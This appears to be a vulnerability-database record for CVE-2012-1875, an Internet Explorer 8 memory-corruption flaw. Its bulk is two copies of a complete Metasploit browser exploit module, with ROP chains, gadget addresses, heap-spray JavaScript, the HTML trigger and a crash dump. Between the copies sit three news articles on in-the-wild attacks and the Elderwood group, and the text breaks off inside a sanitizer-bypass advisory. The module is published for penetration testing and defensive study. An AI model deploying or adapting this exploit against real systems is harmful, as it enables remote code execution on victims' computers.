t['Rop']\n when :msvcrt\n print_status(\"Using msvcrt ROP\")\n rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})\n\n else\n print_status(\"Using JRE ROP\")\n rop = generate_rop_payload('java', '', {'pivot'=>pivot})\n end\n\n return rop\n\n end\n\n def on_request_uri(cli, request)\n\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"Browser not supported: #{agent}\")\n send_not_found(cli)\n return\n end\n\n print_status(\"Client requesting: #{request.uri}\")\n\n p = payload.encoded\n\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\n js_padding = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(my_target.arch))\n js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))\n js_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\n randnop = rand_text_alpha(rand(100) + 1)\n\n js_spray = <<-JS\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var rop_chain = unescape(\"#{js_rop}\");\n var random = unescape(\"#{js_padding}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n\n while (random.length < 0x80000) random += random;\n while (nops.length < 0x80000) nops += nops;\n\n var padding = random.substring(0, #{my_target['RopOffset']}-code.length);\n var shellcode = code + padding + rop_chain + nops.substring(0, 0x800-code.length-padding.length-rop_chain.length);\n\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n\n heap_obj.gc();\n for (var z=1; z < 0x385; z++) {\n heap_obj.alloc(block);\n }\n JS\n\n js_spray = heaplib(js_spray, {:noobfu => true})\n\n trigger_f = \"trigger\"\n feng_shui_f = \"feng_shui\"\n crash_f = \"crash\"\n unescape_f = \"do_unescape\"\n main_f = \"main\"\n a_id = \"MyA\"\n danger_id = \"imgTest\"\n\n if datastore['OBFUSCATE']\n js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)\n js_spray.obfuscate(memory_sensitive: true)\n\n trigger_f = rand_text_alpha(rand(5) + 4)\n feng_shui_f = rand_text_alpha(rand(5) + 4)\n crash_f = rand_text_alpha(rand(5) + 4)\n unescape_f = rand_text_alpha(rand(5) + 4)\n main_f = rand_text_alpha(rand(5) + 4)\n a_id = rand_text_alpha(rand(5) + 4)\n danger_id = rand_text_alpha(rand(5) + 4)\n end\n\n html = %Q|\n <HTML>\n <BODY>\n <title></title>\n <DIV id=testfaild>\n <img id=\"#{danger_id}\" style=\"display:none\">\n <a href=\"javascript:#{feng_shui_f}();\" id=\"#{a_id}\" onClick=\"#{feng_shui_f}();\">\n <div style=\"background-color:#FFFFFF; width:30; height:40\" id=\"#{danger_id}\" src=\"\" onMouseOver=\"#{crash_f}();\" onMouseOut=\"#{crash_f}();\">\n </div>\n </a>\n </DIV>\n <SCRIPT LANGUAGE=\"JavaScript\">\n function #{unescape_f}(dword) {\n var t = unescape;\n var d = Number(dword).toString(16);\n while (d.length < 8) d = '0' + d;\n return t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\n }\n function #{feng_shui_f}() {\n var tag = 0x1c1c1c0c;\n var vtable1 = #{unescape_f}(tag) + '1234567555555555588888888';\n var divs = new Array();\n for (var i = 0; i < 128; i++) divs.push(document.createElement('div'));\n testfaild.innerHTML = testfaild.innerHTML;\n divs[0].className = vtable1;\n divs[1].className = vtable1;\n divs[2].className = vtable1;\n divs[3].className = vtable1;\n }\n function #{crash_f}() {\n eval(\"#{danger_id}\").src = \"\";\n }\n function #{trigger_f}() {\n var x = document.getElementsByTagName(\"div\");\n var fireOnThis = document.getElementById(\"#{a_id}\");\n if (document.createEvent) {\n evObj = document.createEvent('MouseEvents');\n evObj.iniEvent('click', true, false);\n fireOnThis.dispatchEvent(evObj);\n } else if (document.createEventObject) {\n x[1].fireEvent('onMouseOver');\n fireOnThis.fireEvent('onclick');\n x[1].fireEvent('onMouseOut');\n }\n }\n function #{main_f}() {\n\n #{js_spray}\n setTimeout(\"#{trigger_f}();\", 1000);\n\n }\n #{main_f}();\n </SCRIPT>\n </BODY>\n </HTML>\n |\n\n html = html.gsub(/^ {6}/, '')\n\n print_status(\"Sending html\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n\n\n=begin\n* crash\n(a9c.998): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\n*** ERROR: Symbol file could not be found. Defaulted to export\nsymbols for C:\\WINDOWS\\system32\\mshtml.dll -\neax=1c1c1c0c ebx=00000000 ecx=02fdf588 edx=00000001 esi=02fdf588 edi=020bbaf0\neip=6363fcc6 esp=020bba88 ebp=020bba94 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\nmshtml!DllGetClassObject+0xafd09:\n6363fcc6 8b5070 mov edx,dword ptr [eax+70h]\nds:0023:1c1c1c7c=????????\n=end\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms12_037_same_id.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2023-05-11T00:22:15", "description": "Hackers **Exploit Unpatched Windows XML** vulnerability \n\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-n3mMSkku7lQ/T-Te8C7UFrI/AAAAAAAAGs4/BLoHYUeMH_Y/s728-e365/Hackers+Exploit+Unpatched+Windows+XML+vulnerability.jpg>)\n\n \n\n\nAn unpatched vulnerability in the Microsoft XML Core Services (MSXML) is being exploited in attacks launched from compromised websites to infect computers with malware. This zero-day exploit that potentially affects all supported versions of Microsoft Windows, and which has been tied to a warning by Google about state-sponsored attacks, has been identified carrying out attacks in Europe.\n\n \n\n\nMicrosoft security bulletin **[MS12-037](<https://technet.microsoft.com/en-us/security/bulletin/ms12-037>)** was this month's cumulative update for Internet Explorer. It is rated as Critical, and addresses 14 separate vulnerabilities that affect every supported version of Internet Explorer in some way.One vulnerability in particular is more urgent than the rest, though. There are multiple attacks circulating online that target **[CVE-2012-1875](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1875>)**.The name of the vulnerability is \"**Same ID Property Remote Code Execution Vulnerability**\", which doesn't really explain much.\n\n \n\n\nUntil a patch is released, the Microsoft workaround is the only way to stymie hackers. Many security vendors have updated their products to detect malicious code that tries to exploit the vulnerability. Exploit code that works on all versions of Internet Explorer on Windows XP, Vista and 7 has been added to the [Metasploit penetration testing framework](<https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities>).\n\n \n\n\nMicrosoft has provided a [temporary fix](<https://support.microsoft.com/kb/2719615>) for the vulnerability that all Windows users should apply whether or not they use IE as their browser of choice. Most antivirus products have added signatures to detect and block exploits.\n\n \n\n\nIn addition, you can also run the [Fix-It tool](<https://support.microsoft.com/kb/2719615>) from Microsoft. The automated tool implements measures to block the attack vector used to exploit this vulnerability.\n", "cvss3": {}, "published": "2012-06-22T21:14:00", "type": "thn", "title": "Hackers Exploit Unpatched Windows XML vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1875"], "modified": "2012-10-08T20:49:26", "id": "THN:8922BBC1990109DA183D8F29F09C5D00", "href": "https://thehackernews.com/2012/06/hackers-exploit-unpatched-windows-xml.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-01-08T18:01:26", "description": "[![](http://3.bp.blogspot.com/-MDlArapf444/UOmcXhixB7I/AAAAAAAARW4/1iGFFaP3bBM/s320/Latest+Internet+Explorer+zero-day+linked+to+Elderwood+Project.png)](<http://3.bp.blogspot.com/-MDlArapf444/UOmcXhixB7I/AAAAAAAARW4/1iGFFaP3bBM/s1600/Latest+Internet+Explorer+zero-day+linked+to+Elderwood+Project.png>)\n\nLast week we have seen ongoing attacks was exploiting a vulnerability in [Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8](<http://thehackernews.com/2012/12/internet-explorer-6-7-and-8-vulnerable.html>) that came to light after the [Council on Foreign Relations website was hacked](<http://thehackernews.com/2012/12/chinese-hackers-exploiting-internet.html>) and was hosting the code. Symantec has [linked](<http://www.symantec.com/connect/blogs/elderwood-project-behind-latest-internet-explorer-zero-day-vulnerability>) exploits to the group responsible for a spate of recent espionage attacks Dubbed the \"**_Elderwood Project_**\".\n\n \n\n\nIn May 2012, Amnesty International\u2019s Hong Kong website was compromised & used to serve up a malicious SWF file that exploited CVE-2012-1875, a vulnerability affecting Internet Explorer. A few months later in Sep 2012, the same group behind that attack was responsible for using another IE zero-day CVE-2012-4969.\n\n \n\n\nMicrosoft issued a temporary Fix-it patch for the vulnerability but now researchers are claiming that they have bypassed the patch and were able to compromise a fully patched system. Name comes from a source code variable used by the attackers. In the past, the group has used a mix of spear-phishing emails and watering hole attacks to infect vulnerable systems and has a lengthy history of using zero-day bugs as part of their attacks.\n\n \n\n\nThe group, believed to be based in China, has targeted U.S. defense contractors and their partners in the supply chain, including manufacturers of mechanical components. The latest zero-day was used as part of a so-called \"**_[watering hole](<http://thehackernews.com/2013/01/cfr-watering-hole-attack-also-target.html>)_**\" attack against the website for the policy think tank Council on Foreign Relations, the influential membership group that helps shape U.S. foreign policy.\n\n \n\n\nMicrosoft is working on a full patch for the flaw, which, unfortunately, will not make it in time for next week's Patch Tuesday monthly round of Microsoft updates.\n", "cvss3": {}, "published": "2013-01-06T04:49:00", "type": "thn", "title": "Latest Internet Explorer zero-day linked to Elderwood Project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1875", "CVE-2012-4969"], "modified": "2013-01-11T18:02:27", "id": "THN:A27DF5E371A39A7B4C6BA19A7BD3D4BA", "href": "http://thehackernews.com/2013/01/latest-internet-explorer-zero-day.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-11T00:20:15", "description": "[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-MDlArapf444/UOmcXhixB7I/AAAAAAAARW4/1iGFFaP3bBM/s728-e365/Latest+Internet+Explorer+zero-day+linked+to+Elderwood+Project.png>)\n\nLast week we have seen ongoing attacks was exploiting a vulnerability in [Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8](<https://thehackernews.com/2012/12/internet-explorer-6-7-and-8-vulnerable.html>) that came to light after the [Council on Foreign Relations website was hacked](<https://thehackernews.com/2012/12/chinese-hackers-exploiting-internet.html>) and was hosting the code. Symantec has [linked](<https://www.symantec.com/connect/blogs/elderwood-project-behind-latest-internet-explorer-zero-day-vulnerability>) exploits to the group responsible for a spate of recent espionage attacks Dubbed the \"**_Elderwood Project_**\".\n\n \n\n\nIn May 2012, Amnesty International's Hong Kong website was compromised & used to serve up a malicious SWF file that exploited CVE-2012-1875, a vulnerability affecting Internet Explorer. A few months later in Sep 2012, the same group behind that attack was responsible for using another IE zero-day CVE-2012-4969.\n\n \n\n\nMicrosoft issued a temporary Fix-it patch for the vulnerability but now researchers are claiming that they have bypassed the patch and were able to compromise a fully patched system. Name comes from a source code variable used by the attackers. In the past, the group has used a mix of spear-phishing emails and watering hole attacks to infect vulnerable systems and has a lengthy history of using zero-day bugs as part of their attacks.\n\n \n\n\nThe group, believed to be based in China, has targeted U.S. defense contractors and their partners in the supply chain, including manufacturers of mechanical components. The latest zero-day was used as part of a so-called \"**_[watering hole](<https://thehackernews.com/2013/01/cfr-watering-hole-attack-also-target.html>)_**\" attack against the website for the policy think tank Council on Foreign Relations, the influential membership group that helps shape U.S. foreign policy.\n\n \n\n\nMicrosoft is working on a full patch for the flaw, which, unfortunately, will not make it in time for next week's Patch Tuesday monthly round of Microsoft updates.\n", "cvss3": {}, "published": "2013-01-06T15:49:00", "type": "thn", "title": "Latest Internet Explorer zero-day linked to Elderwood Project", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1875", "CVE-2012-4969"], "modified": "2013-01-11T18:02:27", "id": "THN:839440EC2743FF342D27A11CDD9CA91E", "href": "https://thehackernews.com/2013/01/latest-internet-explorer-zero-day.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:20:54", "description": "The infamous **Aurora Trojan** horse is just one of many attacks launched by the same group of malware authors over the past three years, according to researchers at Symantec. Security researchers with Symantec have issued a report outlining the techniques used by the so-called \"**Edgewood**\" hacking platform and the group behind it. The group seemingly has an unlimited supply of zero-day vulnerabilities.\n\n \n\n\nThe company said that the group is well-funded and armed with more than a half-dozen unpublished security vulnerabilities. \"**_They are definitely shifting their methodology, and there are open questions about why that is_**,\" said Eric Chien, senior technical director for Symantec's security response group. \"**_They may be finding that older techniques are no longer working_**.\"\n\n \n\n\n\"**_The number of zero-day exploits used indicates access to a high level of technical capability._**\"The researchers said that the group appears to favour \"watering hole\" attacks techniques in which the attacker profiles a targeted group and places attack code into sites which the targets are likely to visit.\n\n \n**Here are just some of the most recent exploits that they have used:** \n\u2022 Adobe Flash Player Object Type Confusion Remote Code Execution Vulnerability (CVE-2012-0779) \n\u2022 Microsoft Internet Explorer Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875) \n\u2022 Microsoft XML Core Services Remote Code Execution Vulnerability (CVE-2012-1889) \n\u2022 Adobe Flash Player Remote Code Execution Vulnerability (CVE-2012-1535) \n\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-ezXopUbyLrE/UEsDFM4Mu_I/AAAAAAAAIBI/HUNCv1Ids8Q/s728-e365/Operation+Aurora+-+Other+Zero-Day+Attacks+targeting+US+finance+and+Energy.png>)\n\n \n\n\nOperation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010. In the blog post, Google said the attack originated in China.\n\n \n\n\nThe attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. \n \nThe security firm has published details in a 14-page research report titled \"[The Elderwood Project](<https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf>)\". The first thing that stands out in the report is that the vast majority of detections are in the US. In the last year, Symantec detected 677 files used by the Elderwood gang in the US. Rounding out the top five is Canada with 86 files, China with 53, Hong Kong with 31, and Australia also with 31.\n", "cvss3": {}, "published": "2012-09-08T08:36:00", "type": "thn", "title": "Operation Aurora - Other Zero-Day Attacks targeting finance and Energy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0779", "CVE-2012-1535", "CVE-2012-1875", "CVE-2012-1889"], "modified": "2012-10-08T20:55:13", "id": "THN:1E920991DF387C87EA6B7BD7FA5A05C1", "href": "https://thehackernews.com/2012/09/operation-aurora-other-zero-day-attacks.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:36", "description": "", "cvss3": {}, "published": "2012-06-14T00:00:00", "type": "packetstorm", "title": "MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-14T00:00:00", "id": "PACKETSTORM:113682", "href": "https://packetstormsecurity.com/files/113682/MS12-037-Internet-Explorer-Same-ID-Property-Deleted-Object-Handling-Memory-Corruption.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption\", \n'Description' => %q{ \nThis module exploits a memory corruption flaw in Internet Explorer 8 when \nhandling objects with the same ID property. At the moment this module targets \nIE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited \nin the wild. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Dark Son ', # Vulnerability discovery \n'Qihoo 360 Security Center', # Vulnerability discovery \n'Yichong Lin', # Vulnerability discovery \n'Google Inc.', # Vulnerability discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'MSB', 'MS12-037'], \n[ 'CVE', '2012-1875' ], \n[ 'OSVDB', '82865'], \n[ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/'], \n[ 'URL', 'https://twitter.com/binjo/status/212795802974830592' ] # Exploit found in the wild \n], \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ \n'IE 8 on Windows XP SP3 with msvcrt ROP', \n{ \n'Rop' => :msvcrt, \n'RopOffset' => '0x5f4', \n'Ret' => 0x77c15ed5 # xchg eax, esp # ret # from msvcrt.dll \n} \n], \n[ \n'IE 8 on Windows XP SP3 with JRE ROP', \n{ \n'Rop' => :jre, \n'RopOffset' => '0x5f4', \n'Ret' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll \n} \n], \n[ \n'IE 8 on Windows 7 SP1 with JRE ROP', \n{ \n'Rop' => :jre, \n'RopOffset' => '0x5f4', \n'Ret' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jun 12 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n# If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/ \n#Windows XP SP3 + IE 8.0 \nreturn targets[1] \nelsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/ \n#Windows 7 SP1 + IE 8.0 \nreturn targets[3] \nelse \nreturn nil \nend \nend \n \ndef junk(n=4) \nreturn rand_text_alpha(n).unpack(\"V\").first \nend \n \ndef nop \nreturn make_nops(4).unpack(\"V\").first \nend \n \ndef ret(t) \ncase t['Rop'] \nwhen :msvcrt \nreturn [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll \nwhen :jre \nreturn [ 0x7c347f98 ].pack(\"V\") # RETN (ROP NOP) # msvcr71.dll \nend \nend \n \ndef popret(t) \ncase t['Rop'] \nwhen :msvcrt \nreturn [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll \nwhen :jre \nreturn [ 0x7c376541 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcr71.dll \nend \nend \n \ndef get_rop_chain(t) \n \nadjust = ret(t) * 27 \nadjust << popret(t) \nadjust << [t.ret].pack(\"V\") # stackpivot \n \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nrop = \n[ \n0x77c4e392, # POP EAX # RETN \n0x77c11120, # <- *&VirtualProtect() \n0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN \njunk, \n0x77c2dd6c, \n0x77c4ec00, # POP EBP # RETN \n0x77c35459, # ptr to 'push esp # ret' \n0x77c47705, # POP EBX # RETN \n0x00001000, # EBX \n0x77c3ea01, # POP ECX # RETN \n0x77c5d000, # W pointer (lpOldProtect) (-> ecx) \n0x77c46100, # POP EDI # RETN \n0x77c46101, # ROP NOP (-> edi) \n0x77c4d680, # POP EDX # RETN \n0x00000040, # newProtect (0x40) (-> edx) \n0x77c4e392, # POP EAX # RETN \nnop, # NOPS (-> eax) \n0x77c12df9, # PUSHAD # RETN \n].pack(\"V*\") \n \nwhen :jre \nprint_status(\"Using JRE ROP\") \nrop = \n[ \n0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN \n0x00001000, # (dwSize) \n0x7c347f98, # RETN (ROP NOP) \n0x7c3415a2, # JMP [EAX] \n0xffffffff, \n0x7c376402, # skip 4 bytes \n0x7c345255, # INC EBX # FPATAN # RETN \n0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN \n0x7c344f87, # POP EDX # RETN \n0x00000040, # flNewProtect \n0x7c34d201, # POP ECX # RETN \n0x7c38b001, # &Writable location \n0x7c347f97, # POP EAX # RETN \n0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] \n0x7c378c81, # PUSHAD # ADD AL,0EF # RETN \n0x7c345c30, # ptr to 'push esp # ret ' \n].pack(\"V*\") \nend \n \ncode = adjust \ncode << rop \nreturn code \n \nend \n \ndef on_request_uri(cli, request) \n \nagent = request.headers['User-Agent'] \nmy_target = get_target(agent) \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"Browser not supported: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nprint_status(\"Client requesting: #{request.uri}\") \n \np = payload.encoded \n \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) \njs_padding = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(my_target.arch)) \njs_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch)) \njs_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) \n \njs_spray = <<-JS \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar rop_chain = unescape(\"#{js_rop}\"); \nvar random = unescape(\"#{js_padding}\"); \nvar nops = unescape(\"#{js_nops}\"); \n \nwhile (random.length < 0x80000) random += random; \nwhile (nops.length < 0x80000) nops += nops; \n \nvar padding = random.substring(0, #{my_target['RopOffset']}-code.length); \nvar shellcode = code + padding + rop_chain + nops.substring(0, 0x800-code.length-padding.length-rop_chain.length); \n \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \n \nheap_obj.gc(); \nfor (var z=1; z < 0x385; z++) { \nheap_obj.alloc(block); \n} \nJS \n \njs_spray = heaplib(js_spray, {:noobfu => true}) \n \ntrigger_f = \"trigger\" \nfeng_shui_f = \"feng_shui\" \ncrash_f = \"crash\" \nunescape_f = \"do_unescape\" \nmain_f = \"main\" \na_id = \"MyA\" \ndanger_id = \"imgTest\" \n \nif datastore['OBFUSCATE'] \njs_spray = ::Rex::Exploitation::JSObfu.new(js_spray) \njs_spray.obfuscate \n \ntrigger_f = rand_text_alpha(rand(5) + 4) \nfeng_shui_f = rand_text_alpha(rand(5) + 4) \ncrash_f = rand_text_alpha(rand(5) + 4) \nunescape_f = rand_text_alpha(rand(5) + 4) \nmain_f = rand_text_alpha(rand(5) + 4) \na_id = rand_text_alpha(rand(5) + 4) \ndanger_id = rand_text_alpha(rand(5) + 4) \nend \n \nhtml = %Q| \n<HTML> \n<BODY> \n<title></title> \n<DIV id=testfaild> \n<img id=\"#{danger_id}\" style=\"display:none\"> \n<a href=\"javascript:#{feng_shui_f}();\" id=\"#{a_id}\" onClick=\"#{feng_shui_f}();\"> \n<div style=\"background-color:#FFFFFF; width:30; height:40\" id=\"#{danger_id}\" src=\"\" onMouseOver=\"#{crash_f}();\" onMouseOut=\"#{crash_f}();\"> \n</div> \n</a> \n</DIV> \n<SCRIPT LANGUAGE=\"JavaScript\"> \nfunction #{unescape_f}(dword) { \nvar t = unescape; \nvar d = Number(dword).toString(16); \nwhile (d.length < 8) d = '0' + d; \nreturn t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); \n} \nfunction #{feng_shui_f}() { \nvar tag = 0x1c1c1c0c; \nvar vtable1 = #{unescape_f}(tag) + '1234567555555555588888888'; \nvar divs = new Array(); \nfor (var i = 0; i < 128; i++) divs.push(document.createElement('div')); \ntestfaild.innerHTML = testfaild.innerHTML; \ndivs[0].className = vtable1; \ndivs[1].className = vtable1; \ndivs[2].className = vtable1; \ndivs[3].className = vtable1; \n} \nfunction #{crash_f}() { \neval(\"#{danger_id}\").src = \"\"; \n} \nfunction #{trigger_f}() { \nvar x = document.getElementsByTagName(\"div\"); \nvar fireOnThis = document.getElementById(\"#{a_id}\"); \nif (document.createEvent) { \nevObj = document.createEvent('MouseEvents'); \nevObj.iniEvent('click', true, false); \nfireOnThis.dispatchEvent(evObj); \n} else if (document.createEventObject) { \nx[1].fireEvent('onMouseOver'); \nfireOnThis.fireEvent('onclick'); \nx[1].fireEvent('onMouseOut'); \n} \n} \nfunction #{main_f}() { \n \n#{js_spray} \nsetTimeout(\"#{trigger_f}();\", 1000); \n \n} \n#{main_f}(); \n</SCRIPT> \n</BODY> \n</HTML> \n| \n \nhtml = html.gsub(/^\\t\\t\\t/, '') \n \nprint_status(\"Sending html\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n \n=begin \n* crash \n(a9c.998): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export \nsymbols for C:\\WINDOWS\\system32\\mshtml.dll - \neax=1c1c1c0c ebx=00000000 ecx=02fdf588 edx=00000001 esi=02fdf588 edi=020bbaf0 \neip=6363fcc6 esp=020bba88 ebp=020bba94 iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 \nmshtml!DllGetClassObject+0xafd09: \n6363fcc6 8b5070 mov edx,dword ptr [eax+70h] \nds:0023:1c1c1c7c=???????? \n=end`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113682/ms12_037_same_id.rb.txt"}, {"lastseen": "2016-12-05T22:23:57", "description": "", "cvss3": {}, "published": "2012-07-11T00:00:00", "type": "packetstorm", "title": "toStaticHTML HTML Sanitizing Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1858"], "modified": "2012-07-11T00:00:00", "id": "PACKETSTORM:114615", "href": "https://packetstormsecurity.com/files/114615/toStaticHTML-HTML-Sanitizing-Bypass.html", "sourceData": "`toStaticHTML: The Second Encounter (CVE-2012-1858) \n \n*HTML Sanitizing Bypass - \n*CVE-2012-1858<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858> \n \nOriginal advisory - \nhttp://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html \n \nIntroduction \n \nThe *toStaticHTML* component, which is found in Internet Explorer > 8, \nSharePoint and Lync is used to sanitize HTML fragments from dynamic and \npotentially malicious content. \n \nIf an attacker is able to break the filtering mechanism and pass malicious \ncode through this function, he/she may be able to perform HTML injection \nbased attacks (i.e. XSS). \n \nIt has been a year since the first \nencounter<http://blog.watchfire.com/wfblog/2011/07/tostatichtml-html-sanitizing-bypass.html> \nwas \npublished, we've now returned with a new bypass method. \n \nVulnerability \n \nAn attacker is able to create a specially formed CSS 